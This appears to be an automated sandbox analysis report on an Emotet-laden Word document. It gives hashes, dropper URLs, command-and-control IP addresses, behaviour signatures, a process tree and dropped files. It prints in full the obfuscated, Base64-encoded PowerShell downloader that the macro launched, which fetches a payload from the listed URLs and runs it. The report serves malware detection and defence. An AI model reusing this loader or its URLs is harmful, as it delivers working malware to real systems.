Analysis

  • max time kernel
    28s
  • max time network
    32s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    26-10-2020 12:05

General

  • Target

    45e691f571f8909970ad0e971e3938bcb3b65f8c0f741213b9dfe6cd64ba5062.doc

  • Size

    167KB

  • MD5

    25c855ae9ffa280bc8397500ef0b1c2e

  • SHA1

    c5f7ffc4f84e2494473277d797207c092bb59adb

  • SHA256

    45e691f571f8909970ad0e971e3938bcb3b65f8c0f741213b9dfe6cd64ba5062

  • SHA512

    5ba37671f54c349f74cb370edea971f78794d98ee03c627f1018231682df738943a8eae4b14d7420b20101d494a7ced6c712967ac35c78c4eab6ead4ea987476

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://innhanmacquanaogiare.com/wp-includes/Jh1/

exe.dropper

http://www.edgeclothingmcr.com/indexing/c9/

exe.dropper

https://thepremiumplace.com/wp-content/5/

exe.dropper

https://florinconsultancy.com/wp-content/1/

exe.dropper

https://udaysolopiano.com/wp-content/J/

exe.dropper

https://sanayate.com/wp-includes/hd/

exe.dropper

https://www.jorgecoronel.com/webmaster/kYH/

Extracted

Family

emotet

Botnet

Epoch1

C2

81.214.253.80:443

94.23.62.116:8080

98.103.204.12:443

59.148.253.194:8080

197.232.36.108:80

74.58.215.226:80

79.118.74.90:80

181.123.6.86:80

5.89.33.136:80

137.74.106.111:7080

189.223.16.99:80

187.162.248.237:80

181.61.182.143:80

129.232.220.11:8080

178.211.45.66:8080

45.33.77.42:8080

94.176.234.118:443

128.92.203.42:80

12.162.84.2:8080

212.71.237.140:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\45e691f571f8909970ad0e971e3938bcb3b65f8c0f741213b9dfe6cd64ba5062.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3524
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD IAAgACQAcQBQAFoATgBDAD0AIAAgAFsAVAB5AHAARQBdACgAIgB7ADAAfQB7ADUAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADEAfQAiACAALQBGACcAcwAnACwAJwB5ACcALAAnAC4AaQBPACcALAAnAHQATwBSACcALAAnAC4AZABpAHIARQBDACcALAAnAHkAcwB0AGUATQAnACkAIAAgADsAIAAgAHMAZQBUAC0ASQB0AEUATQAgAFYAYQBSAGkAYQBCAGwAZQA6AFoANgBvADUAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAwAH0AewAxAH0AewA0AH0AewAzAH0AewAyAH0AIgAtAGYAIAAnAFMAWQAnACwAJwBzACcALAAnAGEAbgBhAGcARQByACcALAAnAGUAUABvAEkAbgB0AG0AJwAsACcAVABFAE0ALgBOAGUAVAAuAFMARQBSAFYASQBjACcAKQAgACkAIAAgADsAIAAkAE8AbQBwADIAXwB0AGwAPQAoACcAQgAnACsAKAAnAGkAJwArACcANAB4AG8AcwB0ACcAKQApADsAJABGADAAMwB6AG4AawBmAD0AJABaAHgAOQBhAHoAOQBuACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABMAHkAaAAwAHcANgBtADsAJABRAHIAZgBhADcAbwB0AD0AKAAnAEoAJwArACgAJwBqACcAKwAnAHYAXwAnACkAKwAoACcAZAAyACcAKwAnAF8AJwApACkAOwAgACgAIABHAEUAdAAtAHYAYQByAEkAYQBiAEwARQAgAHEAcAB6AG4AYwAgACkALgB2AGEAbABVAGUAOgA6ACIAQwBSAEUAYABBAHQAZQBEAEkAUgBlAGAAYwBgAFQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGYASgB1AFoAeQAnACsAJwB3ACcAKQArACgAJwB4ACcAKwAnAGkANwBuACcAKQArACcAZgBKACcAKwAoACcAdQBNAG4ANwAnACsAJwBkACcAKwAnADgAbgAnACkAKwAoACcAbQAnACsAJwBmAEoAdQAnACkAKQAgAC0AcgBlAHAAbABhAEMARQAoACcAZgBKACcAKwAnAHUAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAVgB2AGQAawBxAGwAdgA9ACgAKAAnAFoAagAnACsAJwBrACcAKQArACcAbQAnACsAKAAnAGwAbQAnACsAJwAxACcAKQApADsAIAAgACgARwBFAHQALQBWAGEAcgBJAGEAYgBMAEUAIABaADYAbwA1ACkALgBWAEEATAB1AGUAOgA6ACIAcwBFAGAAYwBVAHIAYABJAFQAWQBwAFIAYABvAHQATwBDAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAWAA5AGEAOABtAHQAcAA9ACgAKAAnAEMAcgB5ACcAKwAnAHAAbQAnACkAKwAnAG4AJwArACcAYwAnACkAOwAkAFAAZQBlADcAeQBrAHYAIAA9ACAAKAAnAFIAaQAnACsAJwBlACcAKwAoACcAYgAzAGMAcAAnACsAJwBsACcAKQApADsAJABPAGEAdwBkAGcAZQBhAD0AKAAnAEoAJwArACcAZABmACcAKwAoACcAMQBkACcAKwAnAHcAbAAnACkAKQA7ACQATQBnADAAeABnAGoAeAA9ACgAJwBPAHkAJwArACgAJwBkAGgAegAnACsAJwBxACcAKQArACcANgAnACkAOwAkAFYAYQBzAGEAdwBmAGgAPQAkAEgATwBNAEUAKwAoACgAKAAnAE0AJwArACcAQwBGAFoAeQB3AHgAaQA3ACcAKwAnAG4AJwApACsAJwBNACcAKwAnAEMAJwArACgAJwBGACcAKwAnAE0AbgAnACkAKwAoACcANwBkACcAKwAnADgAbgBtAE0AJwArACcAQwAnACkAKwAnAEYAJwApAC4AIgBSAEUAcABsAGEAYABDAEUAIgAoACgAWwBjAGgAQQBSAF0ANwA3ACsAWwBjAGgAQQBSAF0ANgA3ACsAWwBjAGgAQQBSAF0ANwAwACkALAAnAFwAJwApACkAKwAkAFAAZQBlADcAeQBrAHYAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABTAGEANABzADUAcwA5AD0AKAAoACcAUgA3ACcAKwAnADAAagA4AGEAJwApACsAJwB2ACcAKQA7ACQATwBmAGwAcAB5ADEANwA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAZQAnACsAJwBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAEUAQgBjAEwASQBlAG4AdAA7ACQATgB5AGsAcQBpAGIAagA9ACgAJwBoAHQAJwArACgAJwB0ACcAKwAnAHAAOgBbACcAKQArACcAIAB3ACcAKwAnAGUAJwArACgAJwAgAF0AWwAgACcAKwAnAHcAJwApACsAKAAnAGUAJwArACcAIABdACcAKQArACcAaQBuACcAKwAoACcAbgBoAGEAbgBtAGEAJwArACcAYwAnACsAJwBxACcAKQArACcAdQAnACsAKAAnAGEAbgAnACsAJwBhACcAKQArACcAbwAnACsAKAAnAGcAaQAnACsAJwBhAHIAJwApACsAKAAnAGUALgBjACcAKwAnAG8AJwArACcAbQBbACAAdwBlACAAJwArACcAXQB3ACcAKQArACgAJwBwAC0AJwArACcAaQAnACkAKwAnAG4AJwArACgAJwBjAGwAdQAnACsAJwBkAGUAJwArACcAcwBbACAAJwApACsAKAAnAHcAZQAgACcAKwAnAF0ASgBoADEAWwAnACsAJwAgAHcAJwApACsAKAAnAGUAIABdAEAAJwArACcAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAJwArACcAOgAnACkAKwAnAFsAJwArACcAIAB3ACcAKwAoACcAZQAgAF0AJwArACcAWwAgAHcAJwArACcAZQAgACcAKQArACgAJwBdAHcAJwArACcAdwAnACkAKwAoACcAdwAnACsAJwAuAGUAZAAnACkAKwAnAGcAJwArACgAJwBlAGMAbABvAHQAJwArACcAaAAnACkAKwAnAGkAbgAnACsAKAAnAGcAbQAnACsAJwBjACcAKQArACcAcgAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvAG0AJwArACcAWwAnACkAKwAoACcAIAB3ACcAKwAnAGUAIABdACcAKQArACgAJwBpAG4AZABlACcAKwAnAHgAJwApACsAKAAnAGkAJwArACcAbgBnAFsAIAB3AGUAIABdAGMAJwArACcAOQBbACcAKQArACcAIAAnACsAKAAnAHcAZQAgAF0AQAAnACsAJwBoAHQAdABwAHMAJwArACcAOgBbACAAdwBlACAAJwApACsAKAAnAF0AJwArACcAWwAgACcAKQArACcAdwAnACsAKAAnAGUAIABdAHQAJwArACcAaABlAHAAJwApACsAKAAnAHIAJwArACcAZQBtAGkAdQAnACsAJwBtAHAAbABhACcAKQArACgAJwBjACcAKwAnAGUALgBjAG8AbQBbACcAKwAnACAAdwAnACkAKwAoACcAZQAgACcAKwAnAF0AdwBwACcAKwAnAC0AYwBvACcAKwAnAG4AJwApACsAJwB0AGUAJwArACcAbgB0ACcAKwAnAFsAJwArACgAJwAgACcAKwAnAHcAZQAnACkAKwAoACcAIABdACcAKwAnADUAWwAnACkAKwAoACcAIAB3ACcAKwAnAGUAIAAnACkAKwAoACcAXQAnACsAJwBAAGgAJwArACcAdAB0AHAAJwArACcAcwA6AFsAIAB3ACcAKwAnAGUAIABdAFsAIAB3AGUAIABdACcAKQArACgAJwBmAGwAJwArACcAbwAnACkAKwAoACcAcgBpAG4AYwAnACsAJwBvACcAKQArACcAbgBzACcAKwAoACcAdQBsACcAKwAnAHQAJwApACsAKAAnAGEAJwArACcAbgBjAHkAJwApACsAKAAnAC4AYwAnACsAJwBvAG0AWwAnACkAKwAoACcAIAAnACsAJwB3AGUAJwApACsAJwAgACcAKwAoACcAXQB3AHAALQAnACsAJwBjACcAKQArACgAJwBvAG4AdAAnACsAJwBlACcAKQArACgAJwBuACcAKwAnAHQAWwAgACcAKQArACgAJwB3AGUAJwArACcAIAAnACkAKwAnAF0AJwArACcAMQAnACsAJwBbACAAJwArACgAJwB3AGUAIAAnACsAJwBdAEAAJwArACcAaAB0ACcAKQArACcAdAAnACsAJwBwACcAKwAnAHMAJwArACgAJwA6AFsAJwArACcAIAAnACkAKwAnAHcAZQAnACsAKAAnACAAXQBbACcAKwAnACAAJwApACsAJwB3AGUAJwArACcAIABdACcAKwAoACcAdQAnACsAJwBkAGEAJwApACsAKAAnAHkAJwArACcAcwBvAGwAbwBwAGkAYQBuAG8ALgAnACsAJwBjACcAKwAnAG8AbQBbACAAJwApACsAJwB3ACcAKwAoACcAZQAgACcAKwAnAF0AdwBwAC0AJwArACcAYwBvAG4AJwApACsAKAAnAHQAZQAnACsAJwBuACcAKQArACcAdABbACcAKwAnACAAdwAnACsAKAAnAGUAIABdAEoAJwArACcAWwAnACkAKwAnACAAJwArACcAdwAnACsAJwBlACcAKwAoACcAIABdACcAKwAnAEAAaAAnACkAKwAnAHQAdAAnACsAKAAnAHAAcwAnACsAJwA6AFsAJwApACsAJwAgACcAKwAnAHcAJwArACcAZQAnACsAKAAnACAAXQAnACsAJwBbACAAdwBlACcAKQArACcAIAAnACsAKAAnAF0AcwBhACcAKwAnAG4AJwApACsAJwBhAHkAJwArACgAJwBhACcAKwAnAHQAZQAnACkAKwAoACcALgAnACsAJwBjAG8AJwApACsAJwBtAFsAJwArACcAIAAnACsAKAAnAHcAZQAgAF0AJwArACcAdwAnACkAKwAnAHAAJwArACgAJwAtACcAKwAnAGkAbgBjACcAKwAnAGwAdQBkAGUAJwApACsAJwBzACcAKwAnAFsAJwArACgAJwAgAHcAZQAnACsAJwAgACcAKQArACgAJwBdAGgAZABbACAAdwBlACAAJwArACcAXQAnACsAJwBAACcAKwAnAGgAdAB0AHAAJwArACcAcwAnACkAKwAnADoAJwArACcAWwAnACsAKAAnACAAJwArACcAdwBlACAAXQAnACsAJwBbACAAdwBlACAAXQB3AHcAdwAnACkAKwAnAC4AJwArACgAJwBqAG8AJwArACcAcgAnACkAKwAnAGcAZQAnACsAKAAnAGMAJwArACcAbwByACcAKQArACcAbwAnACsAKAAnAG4AZQAnACsAJwBsACcAKwAnAC4AYwAnACsAJwBvAG0AWwAgACcAKQArACgAJwB3ACcAKwAnAGUAIABdAHcAZQBiACcAKQArACcAbQAnACsAKAAnAGEAJwArACcAcwB0ACcAKQArACgAJwBlAHIAWwAnACsAJwAgACcAKQArACgAJwB3ACcAKwAnAGUAIABdAGsAWQAnACkAKwAoACcASABbACcAKwAnACAAdwAnACkAKwAnAGUAJwArACcAIABdACcAKQAuACIAUgBFAHAAbABBAGAAYwBlACIAKAAoACgAJwBbACcAKwAnACAAdwAnACkAKwAoACcAZQAnACsAJwAgAF0AJwApACkALAAnAC8AJwApAC4AIgBzAGAAUABMAEkAdAAiACgAJABWADYAagA3AHEAegAxACAAKwAgACQARgAwADMAegBuAGsAZgAgACsAIAAkAEsAcAB0AHQAYgA0ADYAKQA7ACQARwB5AGEAYwA1ADUAbgA9ACgAKAAnAEcAeAAwAGsAJwArACcAawAnACkAKwAnAG4AagAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE8AZQAwAHEAdgBiAGcAIABpAG4AIAAkAE4AeQBrAHEAaQBiAGoAKQB7AHQAcgB5AHsAJABPAGYAbABwAHkAMQA3AC4AIgBkAGAATwBgAFcAbgBMAG8AYQBkAGYASQBsAGUAIgAoACQATwBlADAAcQB2AGIAZwAsACAAJABWAGEAcwBhAHcAZgBoACkAOwAkAEMAcgBvADUAZwAwAGMAPQAoACgAJwBIACcAKwAnAHMAZABvACcAKQArACgAJwBfACcAKwAnAHAAbAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABWAGEAcwBhAHcAZgBoACkALgAiAGwAYABFAG4AYABHAFQAaAAiACAALQBnAGUAIAA0ADcAMQA3ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAaQAnACsAJwBuADMAJwApACsAKAAnADIAXwBQACcAKwAnAHIAbwBjACcAKQArACgAJwBlAHMAJwArACcAcwAnACkAKQApAC4AIgBDAHIARQBgAEEAVABFACIAKAAkAFYAYQBzAGEAdwBmAGgAKQA7ACQAQQBhAGoAXwBzADUAYQA9ACgAKAAnAEgAJwArACcAdwA1ADEAcQAnACkAKwAnAGEAYgAnACkAOwBiAHIAZQBhAGsAOwAkAFoAcQB2AHAAYgAzAGsAPQAoACgAJwBBADQAJwArACcAbAAxACcAKQArACcAMABhACcAKwAnADYAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAGoAagBtAF8AdgB2AD0AKAAnAEsAbAAnACsAKAAnADcAbgBpACcAKwAnAGwANgAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3520
  • C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Windows\SysWOW64\delegatorprovider\Windows.UI.Xaml.Resources.exe
      "C:\Windows\SysWOW64\delegatorprovider\Windows.UI.Xaml.Resources.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:3316

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    MD5

    19e9c4e042300846d893c913176f41e5

    SHA1

    724099f0e9b99c273695361418acfdebc1b1de66

    SHA256

    65914dfc34889670f6ed2fe09490a313af43a7be21cc16bd7f2889843b1d3f6c

    SHA512

    4f9abf8168a929f315d6adb51a77a9d288c8bbe363a1fb08d1b714ce00fc8f9395981a065d04ae4bc33fad392f77455401dcacc8fde7eed33aa445cb3e17fe19

  • C:\Users\Admin\Zywxi7n\Mn7d8nm\Rieb3cpl.exe
    MD5

    19e9c4e042300846d893c913176f41e5

    SHA1

    724099f0e9b99c273695361418acfdebc1b1de66

    SHA256

    65914dfc34889670f6ed2fe09490a313af43a7be21cc16bd7f2889843b1d3f6c

    SHA512

    4f9abf8168a929f315d6adb51a77a9d288c8bbe363a1fb08d1b714ce00fc8f9395981a065d04ae4bc33fad392f77455401dcacc8fde7eed33aa445cb3e17fe19

  • C:\Windows\SysWOW64\delegatorprovider\Windows.UI.Xaml.Resources.exe
    MD5

    19e9c4e042300846d893c913176f41e5

    SHA1

    724099f0e9b99c273695361418acfdebc1b1de66

    SHA256

    65914dfc34889670f6ed2fe09490a313af43a7be21cc16bd7f2889843b1d3f6c

    SHA512

    4f9abf8168a929f315d6adb51a77a9d288c8bbe363a1fb08d1b714ce00fc8f9395981a065d04ae4bc33fad392f77455401dcacc8fde7eed33aa445cb3e17fe19

  • memory/3316-18-0x0000000002040000-0x0000000002053000-memory.dmp
    Filesize

    76KB

  • memory/3316-17-0x0000000002020000-0x0000000002035000-memory.dmp
    Filesize

    84KB

  • memory/3316-15-0x0000000000000000-mapping.dmp
  • memory/3520-8-0x00007FFDF1740000-0x00007FFDF212C000-memory.dmp
    Filesize

    9.9MB

  • memory/3520-9-0x000001A15DAC0000-0x000001A15DAC1000-memory.dmp
    Filesize

    4KB

  • memory/3520-10-0x000001A1763A0000-0x000001A1763A1000-memory.dmp
    Filesize

    4KB

  • memory/3524-7-0x0000017C14F4A000-0x0000017C14F4F000-memory.dmp
    Filesize

    20KB

  • memory/3524-0-0x00007FFDFD2B0000-0x00007FFDFD8E7000-memory.dmp
    Filesize

    6.2MB

  • memory/3524-6-0x0000017C0FAC7000-0x0000017C0FACC000-memory.dmp
    Filesize

    20KB

  • memory/3524-5-0x0000017C0FAC7000-0x0000017C0FACC000-memory.dmp
    Filesize

    20KB

  • memory/3524-4-0x0000017C14BBA000-0x0000017C14BC2000-memory.dmp
    Filesize

    32KB

  • memory/3524-3-0x0000017C14BBA000-0x0000017C14BC2000-memory.dmp
    Filesize

    32KB

  • memory/3524-2-0x0000017C14BBA000-0x0000017C14BC2000-memory.dmp
    Filesize

    32KB

  • memory/3524-1-0x0000017C14BBA000-0x0000017C14BC2000-memory.dmp
    Filesize

    32KB

  • memory/3664-13-0x0000000002160000-0x0000000002175000-memory.dmp
    Filesize

    84KB

  • memory/3664-14-0x0000000002180000-0x0000000002193000-memory.dmp
    Filesize

    76KB